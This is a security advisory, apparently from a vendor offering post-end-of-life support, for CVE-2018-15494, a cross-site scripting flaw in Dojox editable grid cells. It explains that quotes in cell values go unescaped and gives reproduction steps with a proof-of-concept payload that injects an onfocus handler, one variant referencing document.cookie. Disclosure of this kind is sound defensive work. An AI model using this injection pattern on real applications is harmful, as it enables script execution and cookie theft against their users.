CVE-2018-15494
This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.
Overview
Dojox (or “Dojo Toolkit”) is a collection of optional, extended, and experimental modules for the Dojo Toolkit that provide additional UI widgets, utilities, and advanced features beyond the core Dojo libraries.
A critical severity Cross-Site Scripting (XSS) vulnerability (CVE-2018-15494) has been identified in Dojox. The formatting logic for editable grid cells allows attackers to bypass content restrictions and inject HTML attributes and JavaScript event handlers, leading to arbitrary code execution.
Per OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Details
Module Info
- Product: Dojo
- Affected packages: dojox
- Affected versions:
<1.10.10,
>=1.11.0-rc1 <1.11.6,
>=1.12.0-rc1 <1.12.4,
>=1.13.0 <1.14.0 - GitHub repository: https://github.com/dojo/dojox
- Published packages: https://www.npmjs.com/package/dojox
- Package manager: npm
- Fixed in: NES for Dojo v1.7.4, OSS v1.10.10, OSS v1.11.6, OSS v1.12.4, OSS v1.14.0
Vulnerability Info
This Critical-severity vulnerability is found in many versions of Dojox less than 1.14.0. See the affected versions above for specific details.
Dojox has an editable cell feature. The formatEditing method in dojox/grid/cells/_base.js creates input elements without escaping double quotes in the value attribute. Attackers can inject malicious payloads through user-controlled data like name" onfocus="alert(document.cookie)" x=" which produces executable HTML: <input value="name" onfocus="alert(document.cookie)" x="">. When users click to edit the cell, the injected JavaScript executes.
Steps To Reproduce
- Create a Dojo/Dojox application and set it up to use an editable grid.
- Set up the malicious data in a JavaScript object. This would represent user-controlled data.
<script>
var maliciousDataObj = {
items: [
{ id: 1, name: 'Normal User', email: 'normal@example.com' },
{
id: 2,
name: 'John" onfocus="alert(\'XSS via CVE-2018-15494\')" x="',
email: 'john@example.com'
}
]
}
dojoConfig = {
async: false,
parseOnLoad: true,
isDebug: true
}
</script>
- Associate the data with the editable grid
<!-- Data store containing malicious payload in row 2's name field -->
<span
data-dojo-type="dojo.data.ItemFileWriteStore"
data-dojo-id="vulnStore"
data-dojo-props="data:maliciousDataObj"
></span>
<!-- DataGrid with editable Name column - CVE-2018-15494 vulnerability occurs here -->
<table
data-dojo-type="dojox.grid.DataGrid"
data-dojo-id="vulnGrid"
data-dojo-props="store:vulnStore,
query:{ id: '*' },
rowSelector:'20px',
autoHeight:true,
singleClickEdit:true"
style="width: 500px"
>
<thead>
<tr>
<th width="50px" field="id">ID</th>
<!-- editable="true" enables editing mode which triggers the vulnerability -->
<th width="200px" field="name" editable="true">
Name (Click to Edit)
</th>
<th width="auto" field="email">Email</th>
</tr>
</thead>
</table>
- Clicking on the Name field of the second row should cause an XSS alert to popup.
Mitigation
Dojox version 1.7.x is End-of-Life and will not receive any updates to address this issue. For more information see the Dojo website announcement.
Users of the affected components should apply one of the following mitigations:
- Upgrade affected applications to a fixed version of Dojox and Dojo.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
Credits
- Moritz Bechler of SySS GmbH (finder)
